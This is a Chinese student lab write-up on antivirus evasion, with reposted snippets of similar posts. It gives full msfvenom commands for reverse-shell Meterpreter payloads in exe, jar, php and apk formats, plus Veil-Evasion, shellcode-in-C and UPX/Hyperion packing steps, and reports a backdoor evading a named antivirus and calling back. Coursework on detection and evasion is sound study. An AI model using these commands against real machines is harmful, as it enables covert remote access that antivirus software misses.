20165306 Exp3 免杀原理与实践

Exp3 免杀原理与实践

一、实践内容概述

1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程

2.通过组合应用各种技术实现恶意代码免杀

3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

4.基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 基于特征码的检测

    • 简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。
    • AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。
  • 启发式恶意软件检测
    • 如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,那我们就把它当成一个恶意软件。
    • 优点:可以检测0-day恶意软件;具有一定通用性。
    • 缺点:实时监控系统行为,开销稍多;没有基于特征码的精确度高。
  • 基于行为的恶意软件检测
    • 基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式。

(2)免杀是做什么?

一般是对恶意软件做处理,让它不被杀毒软件所检测,也是渗透测试中需要使用到的技术。

(3)免杀的基本方法有哪些?

  • 改变特征码

    • 如果你手里只有EXE:加壳--压缩壳、加密壳。
    • 有shellcode(像Meterpreter):用encode进行编码;基于payload重新编译生成可执行文件。
    • 有源代码:用其他语言进行重写再编译(veil-evasion)。
  • 改变行为
    • 通讯方式:尽量使用反弹式连接;使用隧道技术;加密通讯数据。
    • 操作模式:基于内存操作;减少对系统的修改;加入混淆作用的正常功能代码。
  • 非常规方法
    • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
    • 使用社工类攻击,诱骗目标关闭AV软件。
    • 纯手工打造一个恶意软件。

二、实践具体步骤

(一)任务一: 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,使用shellcode编程,加壳工具

1.正确使用msf编码器

  • 输入指令# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.19.128 LPORT=5306 -f exe > msf5306.exe生成exe文件

  • Windows自带杀毒软件发现并删除了它

  • 关闭防火墙和实时保护,使用VirusTotal进行扫描

  • 编码多次仍被检测出来的原因:

    • shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中,只要盯住这部分就可以了。
    • 模板是msfvenom用来生成最终Exe的那个壳子exe文件,msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。如果使用msfvenom免杀,就要使用原生的模板。

2.msfvenom生成如jar之类的其他文件

  • 输入指令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x > 5306_java_backdoor.jar生成java后门程序

  • 扫描结果如下

  • 输入指令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_php_backdoor.php生成php后门程序

  • 扫描结果如下

  • 输入指令msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_android_backdoor.apk生成Android后门程序

  • 扫描结果如下


3.使用veil-evasion生成后门程序及检测

  • 打开热点
  • git clone https://www.github.com/Veil-Framework/Veil-Evasion.git从github上进行clone下载
  • 下载完成后,安装软件配置包,依次输入指令ls,cd Veil-Evasion,ls,cd setup,./setup.sh
  • 询问是否继续安装时,输入Y
  • 跳出python for windows安装界面,一路点击Next,Finish,Accept

  • 出现Setup-Ruby1.8.7-p371时,全选中复选框,点击Install

  • 输入list

  • 选择4 c/meterpreter/rev_tcp

  • 依次输入命令set LHOST 192.168.19.128(Kali的IP),set LPORT 5306options

  • 输入指令generate生成文件,输入payload名字veil53061

  • 依图中所示路径,找到了veil53061.exe,小小地开心一哈~

  • 用virustotal检测一下,还是被发现了


4.C语言调用Shellcode

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 -f c用C语言生成一段shellcode

  • touch 20165306buf.c创建一个文件,将刚刚生成的unsigned char buf[]复制到其中

  • 输入指令i686-w64-mingw32-g++ 20165306buf.c -o 20165306.exe生成可执行文件

  • 用virustotal检测如下


5.加壳


- 加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。

- 加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。

- 加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。

- 这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。

- MSF的编码器使用类似方法,对shellcode进行再编码。

- 从技术上分壳分为:

    - 压缩壳:减少应用体积,如ASPack,UPX
    - 加密壳:版权保护,反跟踪。如ASProtect,Armadillo
    - 虚拟机:通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida

  • 压缩壳(UPX)

20165306buf.exe加个壳得到5306_upxed.exe

用virustotal检测如下

  • 加密壳(Hyperion)

5306_upxed.exe拷贝到/usr/share/windows-binaries/hyperion/目录中

进入目录/usr/share/windows-binaries/hyperion/

输入指令wine hyperion.exe -v 5306_upxed.exe 5306_upxed_Hyperion.exe加壳

被Windows自带杀软发现并清除

用virustotal检测如下


(二)任务二:通过组合应用各种技术实现恶意代码免杀

  • veil53061.exe加压缩壳

  • 使用msfconsole回连

  • 电脑管家没有发现


(三)任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

  • 20165306buf加密壳,再压缩壳,生成5306buf_Hyperion_upxed.exe

  • 将Win7虚拟机和Kali ping通,在Win7中设置共享文件夹,安装ncat

  • 使用msfconsole回连

  • Win7的电脑管家13.3.20237.212没有发现


三、实验中遇到的问题

问题1:无法获得锁

  • 原因:其他进程占用了自己要使用的资源
  • 解决:ps aux | grep "apt-get"列出所有占用apt资源的进程,sudo kill 进程id结束其他进程,然后输入指令sudo rm /var/cache/apt/archives/locksudo rm /var/lib/dpkg/lock

参考解决方法

问题2:远端意外挂断了

  • 原因:也许是校园网的问题

问题3:无法打开加过压缩壳的文件

  • 解决:重新把5306_upxed.exe拷贝到指定目录下,确保拷贝成功后,再执行下面的指令

问题4:win7和kali ping不通

  • 解决:如下图改成桥接模式

成功ping通

四、实验体会

1.时刻加强防范意识
2.不要轻言放弃,懂得借力≠完全依靠他人。装veil时我参考了许多同学的博客,装了一下午还是失败,本来想拷同学的虚拟机,但出于和自己较劲的心态,终于找到了适合自己的教程并安装成功,有小小的成就感。继续加油呀~

原文地址:https://www.cnblogs.com/5306xyh/p/10626872.html

时间: 2024-10-09 16:24:41

20165306 Exp3 免杀原理与实践的相关文章

Exp3 免杀原理与实践

Exp3 免杀原理与实践 这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课.另一方面我也想看看metasploit在这场猫鼠游戏中能不能走在安全厂商的前面. 这次的目标免杀平台是64位windows 7 SP1,我用的windows 7 SP1虚拟机中事先装了一下杀毒软件: 火绒 版本:4.0.55.0 360安全卫士 版本:11.4.0.2002 -- 必须连上互联网才能正常工作 在线检测: Virustotal (www.virustotal.com) Virs

网络对抗 Exp3 免杀原理与实践 20154311 王卓然

Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的?  ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件.  ②启发式恶意软件检测:就是根据一个程序的特征和行为如果与恶意软件相似,就判定为恶意软件. ③基于行为的恶意软件检测:同启发式,启发式偏向于对程序的特征扫描,基于行为的则是多了对程序的行为监控. (2)免杀是做什么? 免杀就是使恶意软件能不被AV软件的检测出来,其本身安装的后门能够不被发现,成功存活

2017-2018-4 20155317《网络对抗技术》EXP3 免杀原理与实践

2017-2018-4 20155317<网络对抗技术>EXP3 免杀原理与实践 一.问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.实践 (1) 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 首先尝试一下自己上个实验做出的后门程序 果然是不堪一击...拿去检测一下 装上veil尝试一下结果会如何 : 温馨提示一下,刚开始我是用的自己装的64的ka

2017-2018-2 《网络对抗技术》 20155322 Exp3 免杀原理与实践

#2017-2018-2 <网络对抗技术> 20155322 Exp3 免杀原理与实践 [-= 博客目录 =-] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-正确使用msf编码器 2.2-veil-evasion 2.3-组合应用技术实现免杀 2.4-靶机实测 2.5-基础问题回答 3-资料 1-实践目标 1.1-实践介绍:免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件

20154307《网络对抗》Exp3 免杀原理与实践

20154307<网络对抗>Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件. 启发式恶意软件检测 基于行为的恶意软件检测:检测程序是否会有一些恶意行为,如修改注册表,更改权限等等.. (2)免杀是做什么? 让攻击程序不被杀软查杀 (3)免杀的基本方法有哪些? 加壳 改变特征码 二.实践内容 1.使用msf生成后门程序的检测 由于上一个实验我们已经用msf生成了一

Exp3 免杀原理与实践20154302薛师凡

Exp3 免杀原理与实践20154302薛师凡 一.实践目标与内容 利用多种工具实现实现恶意代码免杀 在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功. 在保证后门程序功能的情况下实现杀软共存. 二.实践过程与步骤 1.使用msf编码器生成的后门程序 上次实践生成的后门程序,直接被360发现了,在virscan网站扫描,也有17个杀毒引擎识别了出来,很容易被辨识出来的. 2.使用veil-evasion生成的后门程序 2.1安装veil平台 apt-get install veil-

Exp3 免杀原理与实践 20154301仉鑫烨

20154301 Exp3 免杀原理与实践 仉鑫烨 一. 实践内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧; 通过组合应用各种技术实现恶意代码免杀; 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本. 二. 基础问题 杀软是如何检测出恶意代码的? 答:①基于特征码检测:如果一个可执行文件包含一段特征码则被认为是恶意代码,过时的特征码库就是没有用的,因此杀毒软件的更新很

20155218《网络对抗》Exp3 免杀原理与实践

20155218<网络对抗>Exp3 免杀原理与实践 一.使用msf生成后门程序的检测 (1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下: (2)使用msf时对它多编码1次并进行测试 发现能发现的杀软变少: (3)使用msf时对它多编码10次并进行测试 编码10次后,发现可以查杀的杀软数量仅仅减少了一个: 二.使用veil-evasion生成后门程序的检测 通过list查看功能,选用22命令 生成文件: 测试结果: 显而易见,效果并不理想: 三.利用shellco

20155232《网络对抗》Exp3 免杀原理与实践

20155232<网络对抗>Exp3 免杀原理与实践 问题回答 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 特征码:一段特征码就是一段或多段数据. 如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. 启发式恶意软件检测 根据些片面特征去推断. 通用性,不精确. 基于行为的恶意软件检测 修改文件硬盘.连接恶意网站.修改注册表 (2)免杀是做什么? 通过一些手段来瞒过杀软的检测扫描.避免被杀毒软件查杀. (3)免杀的基本方法有哪些? 改变特征